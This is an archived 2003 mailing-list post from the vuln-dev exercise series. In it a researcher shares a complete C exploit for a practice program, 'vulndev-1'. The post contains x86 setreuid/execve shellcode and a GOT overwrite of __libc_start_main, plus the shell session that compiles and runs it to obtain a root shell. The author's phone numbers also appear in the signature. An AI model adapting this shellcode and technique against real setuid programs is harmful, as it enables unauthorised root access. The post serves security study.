Re: vulndev-1 exploit.

From: Joel Eriksson <je-vulndev(at)bitnux.com>
Date: Wed May 14 2003 - 05:15:02 EDT

Dear Vulnerability Developers,

Thanks to your remarkably insightful analysis of this utterly complex bug. Heh. Anyway, here's what I come up with. Analyze this! ;-)

PS. Greets to Doug Lee!

[je@vudo ~]$ ADDR=`objdump -R vulndev-1 | awk '$3 == "__libc_start_main" { print $1 }' [je@vudo ~]$ echo $ADDR
08049610
[je@vudo ~]$ cat<<EOF>expldev-1.c

/*
 * Exploit (Linux/x86) for vulndev-1.
 *
 * 2003-05-13 - Joel Eriksson (je at 0xbadc0ded.org)
 */

#include 
#include 

#include <unistd.h>
#include <stdio.h>

char code[] =

"\xeb\x0e" "AAAAAAAAAAAAAA" /* jmp 0x0e ; unlink() is evil. */ \

        /* setreuid(0,0)                                                */ \

        "\x31\xc0"                      /* xor %eax,%eax                */ \

        "\x31\xdb"                      /* xor %ebx,%ebx                */ \

        "\x31\xc9"                      /* xor %ecx,%ecx                */ \

        "\xb0\x46"                      /* mov $0x46,%al                */ \


        "\xcd\x80"                      /* int $0x80                    */ \


        /* execve("/bin/sh", "/bin/sh", NULL)                           */ \

        "\x31\xd2"                      /* xorl %edx,%edx               */ \

        "\x52"                          /* pushl %edx                   */ \

        "\x68\x6e\x2f\x73\x68"          /* pushl $0x68732f6e            */ \

        "\x68\x2f\x2f\x62\x69"          /* pushl $0x69622f2f            */ \

        "\x89\xe3"                      /* movl %esp,%ebx               */ \

        "\x52"                          /* pushl %edx                   */ \

        "\x53"                          /* pushl %ebx                   */ \

        "\x89\xe1"                      /* movl %esp,%ecx               */ \

        "\x8d\x42\x0b"                  /* leal 0xb(%edx),%eax          */ \


        "\xcd\x80";                     /* int $0x80                    */



#define DEF_PROG "./vulndev-1"
#define DEF_ADDR $ADDR /* __libc_start_main GOT-jumpslot */

#define BUF_SIZE 252
#define BOF_SIZE 1

int main(int argc, char **argv)
{

        unsigned int code_addr = 0xc0000000 - 4, dest_addr = DEF_ADDR;
        char *envp[] = { code, NULL };
        char *prog = DEF_PROG;
        char arg1[BUF_SIZE+BOF_SIZE+1];
        char arg2[9];

        if (argc >= 2)
                prog = argv[1];
        if (argc >= 3)
                dest_addr = strtoul(argv[2], NULL, 16);

        memset(arg1, 'A', BUF_SIZE+BOF_SIZE);
        arg1[sizeof(arg1)-1] = '\0';

        code_addr -= strlen(prog) + 1;
        code_addr -= strlen(code) + 1;

        *((unsigned int *) &arg2[0]) = code_addr;
        *((unsigned int *) &arg2[4]) = dest_addr;

        fprintf(stderr, "0x%08x\n", code_addr);
        execle(prog, prog, arg1, arg2, NULL, envp);
        perror("exec");
        return 1;

}
EOF
[je@vudo ~]$ gcc -o expldev-1 expldev-1.c [je@vudo ~]$ ./expldev-1
0xbfffffbd
sh-2.05b# whoami
root
sh-2.05b#

-- 
Joel Eriksson 
-------------------------------------------------
Cellphone: +46-70-288 64 16 Home: +46-26-10 23 37
Security Research & Systems Development at Bitnux
PGP Key Server pgp.mit.edu, PGP Key ID 0x529FDBD1
A615 A1E1 3CA2 D7C2 CFEA 47B4 7EF7 E6B2 529F DBD1
-------------------------------------------------
Do you need more help?
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:
Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek

Received on Wed May 14 11:21:46 2003